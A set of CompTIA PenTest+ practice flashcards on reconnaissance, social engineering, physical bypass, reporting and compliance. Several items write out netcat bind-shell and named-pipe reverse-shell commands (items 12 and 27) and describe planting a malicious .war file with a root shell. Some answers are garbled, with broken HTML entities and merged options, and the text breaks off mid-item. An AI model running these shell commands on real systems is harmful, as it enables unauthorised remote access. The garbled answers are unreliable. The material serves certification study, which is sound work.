CompTIA PenTest+ Certification PT0-001: Practice Test #1 (Total Seminars) Flashcards

1
Q
A methodical approach to defeating a lock, which technique relies on interacting with a lock and its pins in series, addressing them in the order in which they bind the most when pressure is applied with a torque wrench?
A.Tailgating
B.Bumping
C.Single pin picking
D.Double ball
A

C.Single pin picking

Explanation

Correct Answer:

Single pin picking is correct. Single pin picking is a slower, more methodical approach to lockpicking that can produce great results, but is costly in terms of time required and the potential for exposure. Put simply, a lock is probed with a pick while tension is applied with a torque wrench; the pin that binds the most is lifted into a set position while the plug is rotated further, locking the driver pin in place. At this point, another pin begins to bind, making it the new target. This process repeats until all pins are set and the plug completes its turn, unlocking the lock.

Incorrect Answer:

Bumping is incorrect because “bumping” is a lock-picking technique that relies on the use of specially made “bump keys” and a tool called a bump hammer, which is used to “bump” the bump key while attempting to turn the plug; conventional wisdom considers it faster than single pin picking, but louder.

Double ball is incorrect because a double ball is a specific type of pick, rather than a picking technique. Ball and double ball picks are meant to be used when picking locks that use wafers as the main binding mechanism, rather than pins. This typically includes desks, file cabinets, and even some glove boxes in cars.

Tailgating is incorrect because tailgating is used to gain access to a facility after an authorized individual has legitimately opened an access point, rather than a direct attempt to defeat a security mechanism. Basic courtesies are in these situations a security flaw: people are too quick to hold a door open for a co-worker, or even someone who simply appears to belong where they are, in spite of the fact that security policies will typically dictate that employees must swipe their access badges every time they enter a controlled area.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
This category of distributed DoS attack focuses on oversaturating server resources, with its severity measured in packets per second (Pps):
A.Protocol attack
B.ICMP flooding
C.Application layer attack
D.Volume-based attack
A

A.Protocol attack

Explanation

Correct Answer: Protocol attack is correct. A protocol attack is one that is focused on locking up a target system by consuming all available system resources, such as processing capability or memory. Attack severity is measured in packets per second, or Pps.

Incorrect Answers:

Application layer attack is incorrect because an application layer attack attempts to crash a specific service on a target system, rather than bring the entire system down by consuming its available CPU, memory, or storage assets. Application layer attacks are measured in requests per second, or Rps.

Volume-based attack is incorrect because a volume-based attack is one that attempts to consume a target’s available bandwidth (rather than system CPU cycles, memory, or storage), effectively knocking it offline. Volume-based attacks are measured in bits per second, or bps.

ICMP flooding is incorrect because ICMP flooding is a specific example of a volume-based attack, which is itself an incorrect answer. ICMP flooding is a denial of service attack method that focuses on consuming available network bandwidth by filling it with constant ICMP echo requests, effectively wasting bandwidth that would otherwise be used by legitimate traffic. Since these attacks do not target server CPU, memory, or storage resources, this answer is incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
As defined by the OWASP Mobile Security Testing Guide, which core feature of iOS security architecture serves as a restricted area from which applications are executed?
A.Sandbox
B.Encryption and data protection
C.Secure boot
D.Hardware security
A

A.Sandbox

Explanation

Correct Answer:

Sandbox is correct. The sandbox is the restricted area where applications are executed. All applications are sandboxed from each other and core OS files, preventing spillage of information from both lateral means (that is, from another user app) and from higher levels of privilege (that is, from higher order operating system functions).

Incorrect Answer:

Hardware security is incorrect because the hardware security feature provides dedicated cryptographic hardware to secure the operation of the device. Through the use of two AES-256 encryption keys, the Group ID (or GID) and Unique ID (or UID), iOS devices prevent modification of firmware or physical tampering with components meant to bypass data protections.

Secure Boot is incorrect because Secure Boot (or more completely, the Secure Boot chain) employs an Apple-issued root certificate that is used to ensure a device has not been tampered with.

Encryption and data protection is incorrect because encryption, the use of passcodes, and other data protection mechanisms ensure data confidentiality by preventing unauthorized access to encrypted data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
Which command (valid in both *nix and Windows) can resolve a domain name to its IP address?
A.'dig
B.'nslookup'
C.'host'
D.'ping'
A

B.’nslookup’

Explanation

Correct Answer:

‘nslookup’ is correct. The nslookup command for both Windows and *nix systems that can query DNS servers to resolve a domain name to its associated IP address, and vice versa.

Incorrect Answers:

‘ping’ is incorrect because the ping command only sends ICMP packets to a host to confirm that it is reachable.

‘dig’ and ‘host’ are incorrect because although both dig and host are commands that can resolve a domain name to its IP address, they are only valid in *nix operating systems and are not recognized by default on Windows operating systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
A proxy host should be configured as what type of proxy in proxychains to enable DNS queries to go through the proxy host's network?
A.HTTP
B.SOCK4
C.SOCKS5
D.DNS
A

C.SOCKS5

Explanation

Correct Answer:

SOCKS5 is correct. Configuration as a SOCKS5 proxy will allow proxychains to support both TCP and UDP protocols, including DNS.

Incorrect Answers:

DNS is incorrect because DNS proxies will only handle DNS queries and relay that information back to the requesting host or service. In addition, DNS proxies are not a type of proxy that can be configured in proxychains.

SOCKS4 is incorrect because a SOCKS4 proxy will only process TCP-based protocols such as SSH and HTTPS, making it unsuitable for support of UDP-based protocols such as DNS and SNMP.

HTTP is incorrect because HTTP proxies only support HTTP traffic, making them unsuitable not only for UDP-based protocol support, but also other TCP-based protocols, such as SSH and SMB.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
Shodan and Censys are examples of \_\_\_\_\_\_\_\_\_\_, which enable secure discovery of publicly accessible Internet-connected devices. (Fill in the blank.)
A.Maltego transforms
B.Google Dorks
C.Data miners
D.IoT search engines
A

D.IoT search engines

Explanation

Correct Answer:

Internet of Things (IoT) search engines is correct. Shodan and Censys are examples of Internet of Things (IoT) search engines.

Google dorks is incorrect because a Google dork is a loaded search term that returns interesting sites, documents, or resources when entered into the Google search engine.

Maltego transforms is incorrect because Maltego transforms are external resources or APIs that expand the native capabilities of Maltego.

Data miners is incorrect because the term “data miners” is much broader than can be represented solely by “IoT search engines,” leaving this answer inadequate.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
Consider the following nmap output: ``` # Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.1.2.3 () Status: Up Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///, 443/closed/tcp//https///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33 Seq Index: 198 IP ID Seq: All zeros # Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds ``` Notice the OS declaration toward the bottom of the scan output. Given the body of output present, which of the following options was used to attempt OS fingerprinting?
A.-O
B.-sVC
C.-Pn
D.-A
A

A.-O

Explanation

Correct Answer:

-O’ is correct. The -O flag was used to provide OS fingerprinting here. Be careful with questions such as this one: while both the -O and -A flags will result in OS fingerprinting, the -A flag also calls all basic scripting checks to be run against the target for open ports. Since there is no NSE data embedded in the output, we can deduce that no flag was called that causes nmap to run NSE scripts.

Incorrect Answers:

‘-A’ is incorrect because although the -A flag also invokes the nmap scripting engine, there is no NSE data embedded in the output, so we can deduce that this flag was not called to cause nmap to run NSE scripts.

‘-sVC’ is incorrect because the -sVC flag causes both service identification and basic NSE scans but does not attempt fingerprinting.

-Pn is incorrect because the -Pn flag disables pings and skips host discovery.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
During a penetration test, you secure a meeting with a middle manager and ask for a tour of their facility. During the tour, they fail to notice the RFID antenna hidden on your person, swiping authorization data from employee access cards. This is an example of which of the following?
A.Scrubbing
B.Shoulder surfing
C.Piggybacking
D.Badge Cloning
A

D.Badge Cloning

Explanation

Correct Answer:

Badge cloning is correct. Badge cloning is the practice of harvesting employee badge information usually with a high-gain RFID antenna for later replay attacks by writing it to a new access card.

Incorrect Answers:

Piggybacking is incorrect because piggybacking is a synonym for tailgating, a practice used to gain access to a facility after an authorized individual has legitimately opened an access point, such as by swiping an RFID badge to disengage a magnetic door lock, rather than a means of obtaining a functional copy of a working RFID badge.

Shoulder surfing is incorrect because shoulder surfing is the covert observance of individuals for the purpose of collecting sensitive information, and it has no need for the use of an RFID antenna.

Scrubbing is incorrect because scrubbing (sometimes referred to as “raking”) is a lock-picking technique performed by dragging a pick back and forth across the key pins in a lock while varying the tension used on the torque wrench, rather than a technique used to copy working RFID badges.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
The ability of the harvester to identify hosts, IP addresses, and e-mail addresses based on a domain name alone makes it most valuable for which penetration testing methodology?
A.Red team
B.White box
C.Gray box
D.Black box
A

D.Black box

Explanation

Correct Answer:

Black box is correct. The ability to identify hosts, IP addresses, and e-mail addresses based on nothing more than a domain name means the harvester can be exceedingly valuable in penetration tests where one is provided little or no information. Because the black box testing methodology is marked by extremely limited starting information being provided to the tester, this is the correct answer.

Incorrect Answers:

Gray box and White box are incorrect because gray and white box testing both begin with some functional knowledge about the target environment. It should be noted that this does not mean the harvester is not useful during gray and white box engagements; it is simply that because the harvester excels at finding information with very little input, and because gray and white box assessments generally provide a significant amount of information to the penetration tester, the output of this tool will be less revealing in those engagements than it would in a black box assessment.

Red team is incorrect because red team testing is a type of penetration test, rather than a penetration testing methodology.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

For which of the following situations would it be most fitting to recommend onboarding additional personnel as a mitigation measure?
A.The organization relies on hardware and operating systems that have been termed EOL by the vendor
B.The organizations network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for communication
C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance
D.System patches are applied at the whim of the owning manager, resulting in multiple disparate software version and OS distributions requiring support from the server support team

A

C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance

Explanation

Correct Answer:

The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping staging area cause a number of blind spots in remote surveillance is correct. In the situation described, the organization has taken care to protect its boundaries with fencing and cameras, but the use case for a shipping yard results in blind spots in camera coverage. Of the choices given, this is the most appropriate situation to recommend additional personnel in response to the vulnerability present.

Incorrect Answers:

The organization’s network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for internal communication is incorrect because while additional personnel may be necessary to fix the issue, the core problem is not related to personnel issues. In this case, a flat network topography would be best fixed by a technological solution: properly segmenting networks via traditional subnetting and VLAN assignments.

System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team is incorrect because patches being applied at the say-so of the owner of a system or server is indicative of a lack of a patch management plan in the client environment rather than a lack of adequate personnel to deploy software and system patches; in this case, the core problem is procedural, and the implementation of an effective patch management plan would be the best recommendation for mitigation of the issue.

The organization relies on hardware and operating systems that have been termed EOL by the vendor is incorrect because reliance upon end-of-life (EOL) hardware and software is not a problem that can be solved by throwing personnel at it. Here, the core problem is technological in nature, and the acquisition of newer, vendor-supported hardware and software is the best recommendation for mitigation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

During the course of a penetration test, you discover that the credentials you were provided for a web application are invalid. Which of the following describes the best course of action in this scenario?
A.Consult the master service agreement to identify the client organizations named point of contact, and reach out too them for assistance in resolve the issue
B.Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report,
C.Consult the RoE to identify the client organizations named point of contact, and reach out to them for assistance in resolving the issue
D.Restrict all testing activities to those in an uncredentialed context and annotate the discrepancy in the penetration test report

A

C.Consult the RoE to identify the client organizations named point of contact, and reach out to them for assistance in resolving the issue

Explanation

Correct Answer:

Consult the RoE to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is correct. Any issues encountered during the execution of a penetration test should be communicated to the named point of contact as listed in the RoE.

Incorrect Answers:

Consult the master service agreement to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is incorrect because the communication escalation path listing points of contact is found in the RoE rather than in a master service agreement.Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report, preventing testing of the application and restrict all testing activities to those in an uncredentialed context, and annotate the discrepancy in the penetration test report are incorrect because failing to test an in-scope target (or limiting the testing conducted to only that which can be done outside of credentialed access) due to a relatively minor and easily corrected issue with the account credentials would be an abdication of duty on the part of a penetration tester. The point of contact is there to reduce friction and maximize the productivity of a penetration test leaving that resource untapped would be a failure on the part of the tester and diminish the overall quality of the penetration test.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Which command will establish a bound shell on a Windows host? Assume that the nc executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.’nc.exed -nv 10.1.4.4 4444 -e :\Windows\System32\cmd.exe
B.’nc.exe -nvlp 10.1.4.4 4444 cmd.exe’
C.’nc.exe -nv 10.1.2.2. 4444 C:\Windows\System32\cmd.exe
D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe

A

D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe

Explanation

Correct Answer:

nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe is correct. A bound shell requires at a minimum the -l and -p flags to establish a listener and designate the listening port, respectively, a port number, then the -e` flag and the command to execute through the netcat connection (in this case, Windows’ cmd.exe).

Incorrect Answers:

nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe is incorrect because it is attempting to establish a reverse shell, as there is no -l or -p flag present to indicate that a listener is being established on the local host. In addition, this command would attempt to connect to a port on the Windows system itself, which would likely fail as there would not likely be any service listening on port 4444. This answer is also missing the -e flag, which is necessary before declaring the command to be executed across the netcat connection.

nc.exe -nvlp 10.1.4.4 4444 cmd.exe is incorrect because it attempts to establish a listener on the attacking system; this would be met with an error because the IP address 10.1.4.4 would not be available on the victim Windows host to bind a port. In addition, there is no -e flag before the cmd.exe call, which would produce a syntax error.

nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe is incorrect because the command listed would provide a reverse shell to an established netcat listener on the attacking system at port 4444; as stated previously, bound shells require the -l and -p flags in addition to the -e flag.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
In what section of a penetration test report would one expect to find a high-level overview of the results of the test, written specifically for nontechnical stakeholders?
A.Methodology
B.Conclusion
C.E@xecutive summary
D.Appendixes
A

C.E@xecutive summary

Explanation

Correct Answers:

Executive summary is correct. The executive summary is a less technical overview of the findings of a penetration test report, geared toward clearly communicating the findings to client personnel who may not have the background or training necessary to fully understand all the minutiae of the vulnerabilities discovered.

Incorrect Answers:

Conclusion is incorrect because the conclusion of a penetration test report consists of supplemental material that supports the findings of that penetration test, but it is not critical to understand its contents. This can consist of figures and illustrations, appendixes that contain the results of port scans, or other granular details used during the course of the test. As such, this is far from a nontechnical section of the report, and is therefore incorrect.

Methodology is incorrect because the methodology section of a penetration test report presents information regarding testing techniques and practices used as well as the decision-making processes that guided information collection, analysis, and risk evaluation. As this is far more in the weeds than would be appropriate for a nontechnical summary, it is incorrect.

Appendixes is incorrect because appendixes are a component of the conclusion of a penetration test report, and they detail the results of port scans, automated vulnerability scanners deployed in an effort to find low-hanging fruit, and other fine details. As stated previously, this is a much more detailed section of the penetration test report than is appropriate for nontechnical personnel, making this answer incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is the function of an organization’s IT department in relation to a penetration test?
A.Patching systems before the penetration testers can launch exploits
B.Providing penetration testers with software tools needed for the assessment
C.Communications of security policies and remediation of incidental outages
D.Providing final, written authorization for penetration test

A

C.Communications of security policies and remediation of incidental outages

Explanation

Correct Answer:

Communication of security policies and remediation of incidental outages is correct. During a penetration test, an organization’s IT department serves to communicate security policies and remediate any incidents that may occur during the engagement.

Incorrect Answers:

Patching systems before the penetration testers can launch exploits is incorrect because patching systems is certainly within the traditional job scope of an IT department, but with respect to a penetration test it is expected that systems will not be subjected to any configuration changes or updates for the duration of the assessment.

Providing penetration testers with software tools needed for the assessment is incorrect because provisioning of tools required by the penetration testing team is outside of the duties of the IT department as well; although the IT department may coordinate or configure network or VPN access and necessary accounts for credentialed scanning, penetration testers should generally expect to bring their own tools to an engagement.

Providing final, written authorization for the penetration test is incorrect because the signing of the written authorization letter is a function expected of an organization’s executive management or legal personnel.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
During a physical penetration test, you identify that a magnetic door designed to simplify employee egress from a secure area is rather easily defeated; warming up a sheet of paper by holding it close to your body and threading it through the crack between the doors is enough to trip the thermal sensor used to unlock the door from the inside. From here, it is possible to simply pull the door open. Of the following options, this is most likely an example of what?
A.Lock bypass
B.Lock picking
C.Badge cloning
D.Fence jumping
A

A.Lock bypass

Explanation

Correct Answer:

Lock bypass is correct. By tricking the system into thinking an employee is attempting to exit the secured area (through passing a heated sheet of paper through the sensor area of a thermal sensor), the lock is defeated. Because the lock was not interacted with in the manner expected by its manufacturer, this would be an example of a lock bypass.

Incorrect Answers:

Fence jumping is incorrect because fence jumping is used to obtain unauthorized access to an area that has been cordoned off. While this can be a way to get around a lock, a lock bypass specifically refers to unlatching the locking mechanism without interacting with it as intended by the manufacturer, making this answer incorrect.

Lock picking is incorrect because lock picking is a means of defeating physical locks that requires direct interaction with the locking mechanism in question.

Badge cloning is incorrect because badge cloning is the practice of harvesting employee badge information with a high-gain antenna for later replay attacks by writing this information to a new access card, and does not describe a means of defeating locks, directly or otherwise.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
Per Microsoft's published threat modeling procedures, this step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems.
A.Document the threats
B.Decompose the application
C.Rate the threats
D.Identify threats
A

B.Decompose the application

Explanation

Correct Answers:

Decompose the application is correct. The definition provided best describes the third step of Microsoft’s threat modeling process decomposing the application. This step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems; the goal in this step is to develop a security profile that categorizes areas of the architecture that may be susceptible to a general type of vulnerability.

Incorrect Answers:

Identify threats is incorrect because identification of threats is the fourth step in Microsoft’s threat modeling framework and is marked by the categorization of external and internal threats to an organization. The determination of where threats are found, how they can be exploited, and the identification of agents capable of exploiting them are crucial steps that can greatly aid the process of bolstering an organization’s defense posture.

Rate the threats is incorrect because rating the threats is the last step and is often very subjective to the client and the type of environment. Threats are usually assigned a general threat value, such as high, medium, or low. This may be accompanied by a numeric value derived from a simple formula, such as Risk = (Probability) * (Damage Potential).

Document the threats is incorrect because documenting threats is the fifth step and consists of matching threats, threat actors, and vulnerabilities to possible targets within the organization’s own architecture.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
A zone transfer is a reconnaissance technique that elicits information from what service?
A.LLMNR
B.HTTP
C.DNS
D.SFTP
A

C.DNS

Explanation

Correct Answers:

DNS is correct. DNS traditionally listens on UDP/53 for normal name resolution requests, but can also be configured to use TCP/53. Zone transfers are also performed exclusively over TCP/53, and while they have legitimate uses in setting up secondary DNS servers, they can also be used to obtain a wealth of information regarding an environment.

Incorrect Answers:

The other choices are incorrect. Zone transfers are not a feature of HTTP, LLMNR, or SFTP. HTTP is the unencrypted protocol used to serve and access websites and web applications. LLMNR is a protocol based on DNS that allows hosts to communicate with other hosts on the same local link without the need for a full DNS request. SFTP is the SSH-based secure implementation of the File Transfer Protocol, which is used to transfer files to and from target systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
The `use` command in recon-ng is an alias for which other command?
A.'search
B.'set'
C.'reload'
D.'load'
A

D.’load’

Explanation

Correct Answer:

load’ is correct. The command use is an alias for the command load in recon-ng, making them functionally identical.

Incorrect Answers:

The other choices are incorrect because the commands reload, search, and set are not aliases for the command load.

The command reload is used to reload all modules, search allows a user to search through available modules, and set is used to configure module options.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Of the following options, which would the best indicator that a client has requested a red team penetration test?
A.The client has requested that testing take place outside of standard business hours
B.The client has requested an assessment with a longer than typical duration conducted in a manner consistent with a nation statement backed threat
C.The client requires all penetration testers to be US citizens
D.The client is a private aerospace company

A

B.The client has requested an assessment with a longer than typical duration conducted in a manner consistent with a nation statement backed threat
Explanation

Correct Answer:

The client has requested an assessment with a longer-than-typical duration conducted in a manner consistent with a nation-state-backed threat is correct. The request for an assessment that lasts longer than is typical and is to be conducted in a manner consistent with an attack from a nation-state-backed threat actor indicates that the client has requested a red team assessment.

Incorrect Answer:

The client is a private aerospace company is incorrect because the client’s status as a major aerospace corporation has no bearing on the type of assessment they require in a vacuum of further information.

The client requires all penetration testers to be U.S. citizens is incorrect because the requirement that all penetration testers be U.S. citizens is expected when compliance with export control regulations is a factor in the assessment.

The client has requested that testing take place outside of standard business hours is incorrect because the request that testing take place outside of standard business hours has no impact on the requirement to emulate the tactics and techniques of a nation-state-level threat.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
Which ATT&CK matrix category describes techniques used to bypass detection or other network protection mechanisms? Specific examples include bypassing UAC and deploying rootkits.
A.Lateral movement
B.Defense evasion
C.Internal access
D>Persistence
A

B.Defense evasion

Explanation

Correct Answers:

Defense evasion is correct. Defense evasion techniques described in the ATT&CK matrix are ultimately aimed toward evading detection or other network defenses. In the examples provided, bypassing UAC allows attackers to execute commands in an administrative context on Windows systems without a UAC alert notifying users, while rootkits hide the presence of malware by intercepting core operating system calls that supply key system information.

Incorrect Answers:

Initial access is incorrect because initial access techniques are used to gain initial footholds into a target network. Examples of this include spearphishing and abuse of trusted relationships with outside organizations.

Lateral movement is incorrect because lateral movement techniques facilitate an attacker’s movement throughout a target organization’s network, allowing access to and control of additional systems. Examples of this include pass-the-hash and pass-the-ticket attacks.

Persistence is incorrect because persistence techniques consist of any access, action, or configuration changes that enable an attacker to ensure they can retain a presence on the system. Examples of this include modification of user .bash_profile files and new account creation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q
During a physical penetration test, you see a user entering their username and password on a company intranet web application while you glance over from behind as they type. What is this an example of?
A.Shoulder surfing
B.Baiting
C.Pretexting
D.Interrogation
A

A.Shoulder surfing

Explanation

Correct Answer:

Shoulder surfing is correct. Shoulder surfing is the covert observance of individuals geared toward the collection of sensitive information.

Incorrect Answers:

Pretexting is incorrect because pretexting is the creation of a reason-a pretext-for the penetration tester to be in a given place or to be asking for something.

Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.

Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q
During preparation for a phishing campaign, you identify a critical business web application that does not verify the target of a redirect included in an HTTP GET parameter. You choose to create links that route to the legitimate web service but redirect to your attacking system where you are hosting a cloned version of the application's login page that will harvest user credentials. This is an example of what type of vulnerability?
A.Unauthorized API Use
B.Reflected XSS
C.HTTP parameter pollution
D.Unvalidated redirectrion
A

D.Unvalidated redirection

Explanation

Correct Answer:

Unvalidated redirection is correct. Unvalidated redirection occurs when untrusted input is accepted by a web application in such a way that it can cause a visitor to be redirected to another site. If an attacker leverages this and links to a malicious site of their own creation, this attack could be a critical component of a successful phishing campaign, as phishing victims are more likely to trust a link that appears to be part of a site they visit frequently.

Incorrect Answers:

Reflected XSS is incorrect because reflected XSS would require a user to be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim, without storing it locally. In this instance, a malicious link is crafted and sent directly to the user, after which the intended site is loaded before redirecting the visitor to a cloned site under the attacker’s control for the purpose of harvesting credentials. As such, this answer is incorrect.

HTTP parameter pollution is incorrect because HTTP parameter pollution would require the attacker to fuzz the target web server with HTTP requests that have multiple instances of the same HTTP parameter, rather than sending a malicious link to the victim, as in the example. Recall that HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name. Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses.

Unauthorized API use is incorrect because unauthorized API use would involve the use of a feature or interface not intended for typical end users. In this case, a standard feature (an HTTP redirect) is abused due to a lack of sanitization of user input before the redirect is processed, making this answer incorrect as well. As a refresher, unauthorized or unexpected API use can come up for numerous reasons: developers may have left a feature enabled when pushing an application into an environment, development and production environments may not be properly segregated, or developers and administrators may just find it convenient to have the functionality of the API in question available at all times.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

The HIPAA regulatory framework applies for what type of organization?
A.Hospitals, health clinics and other organizations that store patients personal health information, opr PHI
B.Stores retailers that accept credit or debit cards as a means of payment for goods and services
C.US governments agencies, or organizations that do business with the US government
D.Power companies, water companies and other organizations that provide public utilities

A

A.Hospitals, health clinics and other organizations that store patients personal health information, opr PH

Explanation

Correct Answer:

Hospitals, health clinics, and other organizations that store patients’ personal health information, or PHI is correct. HIPAA regulations-those imposed by the Health Insurance Portability and Accountability Act-apply to hospitals, health clinics, and other organizations that must store the personal health information of their patients.

Incorrect Answers:

Stores and retailers that accept credit or debit cards as a means of payment for goods and services is incorrect because stores, retailers, and other organizations that accept debit or credit cards as a means of payment are subject to PCI DSS regulations.

U.S. government agencies, or organizations that do business with the U.S. government is incorrect because U.S. government agencies and organizations that do business with the U.S. government are subject to the FISMA regulatory framework.

Power companies, water companies, and other organizations that provide public utilities is incorrect because power and water companies and other public utilities do not have a dedicated regulatory framework for their security, but they may adhere to FISMA or other state or local guidelines as mandated by the appropriate legal authorities.I

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

During a penetration test, you obtain a reverse shell on a system by uploading a malicious .war file to a Tomcat server and then establish persistence by adding a startup service that establishes a bound root shell on port 31173. During enumeration of the system, you determine that a local user account is using its username as its password, and that the same user has scripts with hardcoded credentials stored in their home directory. Which of the following actions should be taken as part of the post-engagement cleanup for this server? (Choose two.)
A.Change the users password to a more secure, randomly generated string and notify them via e-mail
B.Delete the lines of text containing an account credentials in the script found in the user’s home directory
C.Remove of the malicious .war file
D.Delete the startup service that establishes the bound shell

A

C.Remove of the malicious .war file
D.Delete the startup service that establishes the bound shell

Explanation

Correct Answers:

Remove of the malicious .war file and Delete the startup service that establishes the bound shell are correct. When leaving a tool or file in place would expose a client to additional risk, it is a best practice to make all efforts to remove it whenever possible. These answers are the best possible examples of this in the given choices.

Incorrect Answers:

Change the user’s password to a more secure, randomly generated string and notify them via e-mail and Delete the lines of text containing account credentials in the scripts found in the user’s home directory are incorrect. The poor password and insecurely stored passwords found in the user’s scripts are examples of issues that existed at the beginning of the engagement. While it is appropriate to write these issues up as separate findings in the penetration test report, the onus is on the client to remedy these security shortcomings.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Single sign-on (SSO) architectures enhance system simplicity by allowing services requiring authentication to effectively delegate trust to another central system, relying on that system’s affirmation that a user is both identified correctly and authorized for the service they want to use. Which of the following is not an example of an SSO-enabling identity protocol?
A.Active Directory Federated Services (ADFS)
B.OpenID
C.SELinux
D.OAuth

A

C.SELinux

Explanation

Correct Answer:

SELinux is correct. SELinux is a security module that facilitates access control policies in Linux operating systems.

Incorrect Answers:

The other choices are incorrect because Oauth, OpenID, and Active Directory Federated Services (ADFS) are all identity protocols that enable deployment of SSO in a given network environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Consider an /etc/hosts file with hundreds of entries similar to the following:

10.10.1.2 host.domain.com host
Of the following options, which would be the best choice to create a text file containing a list of IP addresses?
A.’awk{‘print$1’] /etc/hosts»ips.txt
B.’grep -v domain.com /etc/hosts&raquo_space;ips.txt
C.’awk{‘print$2|/etc/hosts > ips.txt’
D.’grep 10./etc/hosts&raquo_space; ips.txt’
A

A.’awk{‘print$1’] /etc/hosts»ips.txt

Explanation

Correct Answer:awk {'print $1'} /etc/hosts >> ips.txt is correct. The print function in awk can be used to extract specific columns of text as delineated by whitespace (that is, spaces or tabs), or by any other delimiter character when used with the -F flag. The&raquo_space; operator is used to concatenate output to the named file rather than overwrite the entire file each time matching data is found.

Incorrect Answers:grep 10. /etc/hosts >> ips.txt is incorrect because the use of grep would pull the entire line any time a match for “10.” was found, rather than just the IP address in question.

awk {'print $2'} /etc/hosts > ips.txt is incorrect because the use of {'print $2'} in awk would print the second field of text usually a hostname or FQDN in a hosts file rather than the IP addresses.

‘grep -v domain.com /etc/hosts&raquo_space; ips.txt is incorrect because the use of grep would pull whole lines rather than individual fields of data before feeding them into the text file. In addition, the -v` flag would provide matches for all lines that did not contain the string “domain.com”, leaving only lines which did not contain an FQDN.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

During a penetration test, you have obtained low privilege command execution via web application command injection on a target system where the installed version of netcat does not support the -e option. You elect to establish a reverse shell using a named pipe. The target IP address is 10.1.2.6, your attacking IP address is 10.1.2.2, and you have established a netcat listener with the command nc -nvlp 4444. Select the answer that will complete the command sequence to obtain a reverse shell callback.```mknod /tmp/fifo p; /bin/sh -c “/bin/sh 0/tmp/fifo’
B.’nc 10.1.2.2 44441> /tmp/info
C.’1>/tmp/fifo > nc 10.1.2.2.4444’
D.’nc 10.1.2.6 4444 1>/tmp/fifo’

A

B.’nc 10.1.2.2 44441> /tmp/info

Explanation

Correct Answer:

nc 10.1.2.2 4444 1>/tmp/fifo is correct. It takes the standard output (STDOUT, file descriptor 1) of the netcat connection (that is, commands sent by the attacker, since this is on the target system) and feeds it back into the named pipe, completing the reverse shell.

Incorrect Answers:

nc 10.1.2.2 4444 2>/tmp/fifo is incorrect because it would feed the STDERR output of the netcat instance to the named pipe, resulting in nothing being fed to the /bin/sh instance unless there was an error in the netcat command (which would immediately close with a nonzero exit code).

1>/tmp/fifo > nc 10.1.2.2 4444 is incorrect for a number of reasons: The STDOUT redirect is at the beginning of the line, which would place it directly after the named pipe. This is incorrect because the output redirect needs to go from the netcat connection to the named pipe. In addition, this configuration would dump the contents of /tmp/fifo to a file named “nc” in the current working directory, then fail when attempting to execute a command named

